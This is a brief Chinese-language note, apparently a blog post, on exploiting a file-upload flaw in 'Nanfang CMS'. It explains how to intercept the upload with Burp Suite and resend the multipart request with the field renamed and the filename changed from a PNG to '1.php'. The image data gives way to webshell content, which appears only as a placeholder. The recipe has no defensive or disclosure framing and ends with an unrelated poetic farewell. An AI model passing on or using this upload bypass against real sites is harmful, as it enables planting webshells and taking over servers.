這個漏洞在南方cms 上出現的
主要是上傳時候利用bp抓包
然後滑鼠右鍵吧資料包發送到Repeater子產品
找到你上傳的包内容 一般是
------61234564788
Content-Disposition: form-data; name="FileName"; filename=“1.png”
圖檔内容
------61234564788--
改成
Content-Disposition: form-data; name="FileName1"; filename=“1.php”
馬内容
從此山高路遠,縱馬揚鞭。願往後旅途,三冬暖,春不寒,天黑有燈,下雨有傘。此生盡興,不負勇往。